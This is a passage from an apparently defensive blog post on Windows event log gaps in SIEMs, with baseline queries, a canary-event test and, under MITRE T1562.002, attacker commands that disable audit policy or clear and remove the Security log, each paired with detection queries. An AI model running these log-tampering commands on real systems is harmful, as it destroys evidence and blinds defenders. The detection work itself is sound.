anchorTargetStickyNavbar_Vzrq\" id=\"62-the-event-volume-baseline-method\">6.2 The Event Volume Baseline Method<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#62-the-event-volume-baseline-method\" class=\"hash-link\" aria-label=\"Direct link to 6.2 The Event Volume Baseline Method\" title=\"Direct link to 6.2 The Event Volume Baseline Method\" translate=\"no\">​</a></h3>\n<p>A subtler but more scalable approach: establish a baseline of expected event volume per host per event type, then alert on deviations.</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=wineventlog source=\"WinEventLog:Security\" EventCode=4688</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| timechart span=1h count by host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| foreach [</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    eval avg_$host$ = mvavg($host$, 168),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    eval pct_of_avg_$host$ = round(($host$ / avg_$host$) * 100, 0)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  ]</span><br></span></code></pre></div></div>\n<p>More practically, for a KQL (Microsoft Sentinel) equivalent:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect hosts reporting significantly fewer events than their 7-day average</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Indicator of agent failure, log overwrite acceleration, or active suppression</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let lookback = 7d;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let evaluationWindow = 1h;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SecurityEvent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(lookback)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventID == 4688  // Process creation  high volume, good baseline indicator</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    EventCount = count() </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by Computer, bin(TimeGenerated, evaluationWindow)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AvgHourlyCount = avg(EventCount),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    StdDev = stdev(EventCount),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LastHourCount = take_anyif(EventCount, TimeGenerated &gt; ago(evaluationWindow))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by Computer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnotempty(LastHourCount)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DropThreshold = AvgHourlyCount * 0.5,  // Alert if below 50% of average</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PctOfAverage = round((LastHourCount / AvgHourlyCount) * 100, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where LastHourCount &lt; DropThreshold</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AvgHourlyCount &gt; 10  // Exclude hosts with low baseline (too noisy)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project Computer, AvgHourlyCount, LastHourCount, PctOfAverage, DropThreshold</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by PctOfAverage asc</span><br></span></code></pre></div></div>\n<p>This query runs every hour. Any host reporting fewer than 50% of its normal process creation events triggers an alert. The root cause could be: the machine is off (expected), the agent crashed (fix it), the log is not being collected (configuration issue), or an attacker suppressed logging (respond immediately).</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"63-the-gold-standard-synthetic-event-injection\">6.3 The Gold Standard: Synthetic Event Injection<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#63-the-gold-standard-synthetic-event-injection\" class=\"hash-link\" aria-label=\"Direct link to 6.3 The Gold Standard: Synthetic Event Injection\" title=\"Direct link to 6.3 The Gold Standard: Synthetic Event Injection\" translate=\"no\">​</a></h3>\n<p>The most reliable test: inject known events into a source machine and verify they appear in your SIEM with the correct fields within an expected time window. This is functionally equivalent to a canary test for your collection pipeline.</p>\n<!-- -->\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On a test or production machine:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Inject a synthetic event into the Application log with a unique identifier</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># that you can search for in your SIEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$uniqueMarker = \"SIEM-FIDELITY-TEST-$(Get-Date -Format 'yyyyMMdd-HHmmss')-$(New-Guid)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Write a synthetic event using .NET EventLog class</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$eventSource = \"SIEMFidelityTest\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if (-not [System.Diagnostics.EventLog]::SourceExists($eventSource)) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [System.Diagnostics.EventLog]::CreateEventSource($eventSource, \"Application\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$log = New-Object System.Diagnostics.EventLog(\"Application\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$log.Source = $eventSource</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$log.WriteEntry($uniqueMarker, [System.Diagnostics.EventLogEntryType]::Information, 9999)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Injected marker: $uniqueMarker\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Now search your SIEM for this string within the next 5 minutes.\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"If absent after 10 minutes, the collection pipeline has a gap.\"</span><br></span></code></pre></div></div>\n<p>You can wrap this into a scheduled task that runs every 4 hours, writes a unique marker, and then a separate SIEM query checks for the marker's arrival within a 15-minute window. Missing markers = pipeline failure = automatic ticket.</p>\n<p>SIEM search to validate the marker arrived (Splunk):</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=wineventlog OR index=windows EventCode=9999 source=\"WinEventLog:Application\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Message like \"%SIEM-FIDELITY-TEST%\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| rex field=Message \"SIEM-FIDELITY-TEST-(?&lt;marker_id&gt;[^\\s]+)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval latency_seconds = now() - strptime(substr(marker_id, 1, 15), \"%Y%m%d-%H%M%S\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table _time, host, marker_id, latency_seconds</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort -_time</span><br></span></code></pre></div></div>\n<p>If <code>latency_seconds</code> is consistently over 900 (15 minutes), your collection pipeline is too slow for meaningful detection of fast-moving incidents.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"64-checking-wef-subscription-health\">6.4 Checking WEF Subscription Health<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#64-checking-wef-subscription-health\" class=\"hash-link\" aria-label=\"Direct link to 6.4 Checking WEF Subscription Health\" title=\"Direct link to 6.4 Checking WEF Subscription Health\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On the WEC server  view health of all subscriptions and their sources</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil es  # List all subscriptions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># For each subscription, check the runtime status of all enrolled sources</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$subscriptions = wecutil es</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($sub in $subscriptions) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"`n=== Subscription: $sub ===\" -ForegroundColor Cyan</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Get full subscription config</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    wecutil gs \"$sub\" | Select-String -Pattern \"Name|Status|Enabled|Uri\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Get per-source runtime status</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    wecutil gr \"$sub\" | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($_ -match \"Source|LastError|NextRetry|LastHeartbeat\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($_ -match \"LastError\" -and $_ -notmatch \"LastError: 0x0\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Write-Host $_ -ForegroundColor Red  # Non-zero error = problem</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            } else {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Write-Host $_</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<p>Look for sources with <code>LastError</code> values other than <code>0x0</code>. Common error codes and their meaning:</p>\n<table><thead><tr><th>Error Code</th><th>Meaning</th><th>Action</th></tr></thead><tbody><tr><td>0x0</td><td>OK</td><td>None needed</td></tr><tr><td>0x80070005</td><td>Access denied</td><td>Check WinRM configuration, DACL on subscription</td></tr><tr><td>0x80070776</td><td>Subscription not found</td><td>Re-apply GPO, restart WEC service</td></tr><tr><td>0x803300004</td><td>Connection refused</td><td>WinRM not running on source, firewall blocking 5985</td></tr><tr><td>0x803300005</td><td>Could not connect</td><td>DNS resolution failure, network issue</td></tr><tr><td>0x8033000f</td><td>No more endpoints</td><td>Source machine offline or unreachable</td></tr></tbody></table>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find all WEF sources that haven't heartbeated in the last 2 hours</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># These are machines with potential coverage gaps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$twoHoursAgo = (Get-Date).AddHours(-2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil gr \"BaselineSubscription\" |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-String \"Source:|LastHeartbeat:\" |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $line = $_.Line.Trim()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($line -match \"^Source:\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $currentSource = ($line -split \"Source: \")[1]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($line -match \"LastHeartbeat:\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $hb = ($line -split \"LastHeartbeat: \")[1]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($hb -ne \"N/A\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $heartbeatTime = [DateTime]::Parse($hb)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                if ($heartbeatTime -lt $twoHoursAgo) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    Write-Warning \"STALE: $currentSource last heartbeat: $heartbeatTime\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-7--attackers-exploiting-these-gaps-t1562002\">Part 7  Attackers Exploiting These Gaps: T1562.002<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-7--attackers-exploiting-these-gaps-t1562002\" class=\"hash-link\" aria-label=\"Direct link to Part 7  Attackers Exploiting These Gaps: T1562.002\" title=\"Direct link to Part 7  Attackers Exploiting These Gaps: T1562.002\" translate=\"no\">​</a></h2>\n<p>Everything above describes accidental gaps. Sophisticated attackers deliberately exploit them. MITRE ATT&amp;CK T1562.002 (Impair Defenses: Disable Windows Event Logging) documents the specific techniques.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"71-disabling-audit-policy-mid-attack\">7.1 Disabling Audit Policy Mid-Attack<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#71-disabling-audit-policy-mid-attack\" class=\"hash-link\" aria-label=\"Direct link to 7.1 Disabling Audit Policy Mid-Attack\" title=\"Direct link to 7.1 Disabling Audit Policy Mid-Attack\" translate=\"no\">​</a></h3>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Attacker with local admin rights can disable specific audit subcategories</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: to suppress logging of their specific techniques</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Disable process creation logging before running tools</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /set /subcategory:\"Process Creation\" /success:disable /failure:disable</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Disable logon event logging during lateral movement</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /set /subcategory:\"Logon\" /success:disable</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: This generates Event ID 4719 (audit policy changed)  IF you're logging it</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Most environments don't alert on 4719. Check yours:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /get /subcategory:\"Audit Policy Change\"</span><br></span></code></pre></div></div>\n<p>The defense: Alert on Event ID 4719 (system audit policy changed). This event is generated whenever <code>auditpol</code> modifies the local policy. It is one of the highest-fidelity indicators of active defense evasion  it has almost no legitimate use outside of planned administrative changes.</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL  Alert on audit policy changes from non-scheduled-task processes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SecurityEvent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventID == 4719</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    SubjectUser = tostring(EventData.SubjectUserName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    SubjectLogon = tostring(EventData.SubjectLogonId),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AuditPolicyChanges = tostring(EventData.AuditPolicyChanges)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where SubjectUser !endswith \"$\"  // Exclude machine accounts (GPO application)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Computer, SubjectUser, AuditPolicyChanges</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"72-clearing-the-event-log\">7.2 Clearing the Event Log<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#72-clearing-the-event-log\" class=\"hash-link\" aria-label=\"Direct link to 7.2 Clearing the Event Log\" title=\"Direct link to 7.2 Clearing the Event Log\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker clears the Security log to destroy evidence</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil cl Security   # Generates Event 1102 (audit log cleared)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Clear-EventLog -LogName Security  # Same result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Remove-EventLog is more destructive  removes the channel entirely</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-EventLog -LogName Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Does NOT generate 1102  the channel is gone before the event can be written</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Generates 104 in System log (log service error)</span><br></span></code></pre></div></div>\n<p>Detecting log clearing:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Alert on Event 1102 (Security log cleared)  rare legitimate event</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SecurityEvent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventID == 1102</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Computer, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Account = tostring(EventData.SubjectUserName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          LogonId = tostring(EventData.SubjectLogonId)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Also alert on Event 104 (System log) which indicates service-level log removal</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventLog == \"System\" and EventID == 104</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Computer, RenderedDescription</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"73-etw-provider-tampering-advanced\">7.3 ETW Provider Tampering (Advanced)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#73-etw-provider-tampering-advanced\" class=\"hash-link\" aria-label=\"Direct link to 7.3 ETW Provider Tampering (Advanced)\" title=\"Direct link to 7.3 ETW Provider Tampering (Advanced)\" translate=\"no\">​</a></h3>\n<p>A sophisticated attacker can tamper with ETW at the kernel level, disabling specific providers without triggering log-clearing events:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Technique: Patch the ETW provider registration in the target process's memory</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">to return early from the ETW write function, silently suppressing all</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 